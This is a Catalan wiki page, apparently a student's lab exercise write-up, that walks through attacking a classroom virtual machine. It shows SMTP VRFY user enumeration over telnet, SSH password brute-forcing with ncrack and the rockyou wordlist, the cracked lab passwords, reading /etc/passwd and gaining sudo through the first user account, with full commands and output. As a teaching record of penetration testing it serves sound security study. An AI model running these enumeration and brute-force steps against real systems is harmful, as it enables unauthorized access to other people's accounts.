ASIX/M16/UF2/EX3/5

De Lordwektabyte Wiki
< ASIX/M16/UF2‎ | EX3
La revisió el 12:57, 17 març 2019 per Guillem (discussió | contribucions) (Es crea la pàgina amb «Una vegada llistats els serveis, podem seguir investigant sobre cada un buscant maneres de poder fer enumeració d'usuaris o dades que ens puguin ser rellevants. ==SM...».)
(dif) ← Versió més antiga | Versió actual (dif) | Versió més nova → (dif)
Salta a la navegació Salta a la cerca

Una vegada llistats els serveis, podem seguir investigant sobre cada un buscant maneres de poder fer enumeració d'usuaris o dades que ens puguin ser rellevants.

SMTP

Veiem que hi ha obert un servidor SMTP. Segons apunts de la UF, podem provar si la comanda VRFY <usuari> es permet i podem extreure algun usuari relacionat amb l'organització des d'on s'ha extret aquesta màquina (Institut Carles Vallbona)

root@kali-gsb:~# telnet 10.16.2.9 25
Trying 10.16.2.9...
Connected to 10.16.2.9.
Escape character is '^]'.
220 enum.iescarlesvallbona.cat ESMTP Postfix (Ubuntu)
VRFY roger
252 2.0.0 roger
VRFY pau
252 2.0.0 pau
VRFY julian
252 2.0.0 julian
VRFY jaume
252 2.0.0 jaume
VRFY guillem
550 5.1.1 <guillem>: Recipient address rejected: User unknown in local recipient table

Veiem, manualment, que aquests usuaris existeixen excepte guillem. Això ens pot ser suficient per a provar d'extreure contrasenyes dels usuaris mitjançant força bruta a través del servei SSH per exemple.

Una altra opció seria utilitzar scripts o mòduls de NMap per a passar-li llistes d'usuaris i que ens retorni si existeixen al sistema o no.

SSH

Amb ncrack provarem d'accedir per SSH amb algun usuari que tingui una contrasenya feble o vulnerable present al wordlist de Kali rockyou.txt

root@kali-gsb:~# ncrack -p 22 -user roger -P /usr/share/wordlists/rockyou.txt 10.16.2.9

Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET

Discovered credentials for ssh on 10.16.2.9 22/tcp:
10.16.2.9 22/tcp ssh: 'roger' 'whatever'

Ncrack done: 1 service scanned in 3.00 seconds.

Ncrack finished.

Hem trobat que l'usuari roger té la contrasenya whatever.

El següent pas serà accedir per SSH amb aquestes credencials i mirar si tenim permisos per llegir l'arxiu /etc/passwd i poder així, llistar la resta d'usuaris del sistema en la seva totalitat.

root@kali-gsb:~# ssh roger@10.16.2.9
roger@10.16.2.9's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Mar 17 11:32:39 UTC 2019

  System load:  0.0               Processes:             98
  Usage of /:   44.7% of 9.78GB   Users logged in:       0
  Memory usage: 4%                IP address for enp0s3: 10.16.2.9
  Swap usage:   0%


118 packages can be updated.
0 updates are security updates.


Last login: Sun Mar 17 11:30:24 2019 from 10.16.2.11
roger@enum:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
enum:x:1000:1000:enum:/home/enum:/bin/bash
julian:x:1001:1001:,,,:/home/julian:/bin/bash
pau:x:1002:1002:,,,:/home/pau:/bin/bash
jaume:x:1003:1003:,,,:/home/jaume:/bin/bash
xavi:x:1004:1004:,,,:/home/xavi:/bin/bash
roger:x:1005:1005:,,,:/home/roger:/bin/bash
bind:x:111:113::/var/cache/bind:/usr/sbin/nologin
Debian-snmp:x:112:114::/var/lib/snmp:/bin/false
postfix:x:113:116::/var/spool/postfix:/usr/sbin/nologin
dovecot:x:114:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:115:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
openldap:x:116:120:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false

També podem provar si aquest usuari té permisos de sudo:

roger@enum:~$ sudo nano /etc/passwd
[sudo] password for roger: 
roger is not in the sudoers file.  This incident will be reported.

L'usuari roger no està a sudoers, però al veure que es tracta d'un Ubuntu, podem deduir que l'usuari amb UID=1000 tindrà permisos de sudo. Segons l'arxiu d'usuaris, aquest usuari correspon a enum:

enum:x:1000:1000:enum:/home/enum:/bin/bash

Per tant, el següent pas, serà executar ncrack de nou amb l'usuari enum per veure si la contrasenya és present en aquell wordlist

root@kali-gsb:~# ncrack -p 22 -user enum -P /usr/share/wordlists/rockyou.txt 10.16.2.9
 
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET
 
Discovered credentials for ssh on 10.16.2.9 22/tcp:
10.16.2.9 22/tcp ssh: 'enum' 'trustno1'
 
Ncrack done: 1 service scanned in 3.00 seconds.
 
Ncrack finished.

Accedirem per SSH amb la contrasenya que hem extret

root@kali-gsb:~# ssh enum@10.16.2.9
enum@10.16.2.9's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Mar 17 12:38:49 UTC 2019

  System load:  0.31              Processes:             98
  Usage of /:   45.5% of 9.78GB   Users logged in:       0
  Memory usage: 4%                IP address for enp0s3: 10.16.2.9
  Swap usage:   0%


118 packages can be updated.
0 updates are security updates.


Last login: Wed Feb 20 16:38:32 2019 from 10.16.2.8

Aleshores farem la mateixa prova que amb l'altre usuari: executar una comanda amb sudo per veure si podem fer un moviment vertical i arribar a poder administrar el sistema o modificar arxius dins del home de l'usuari root:

sudo nano /root/prova.enum

Veiem que se'ns dóna permís.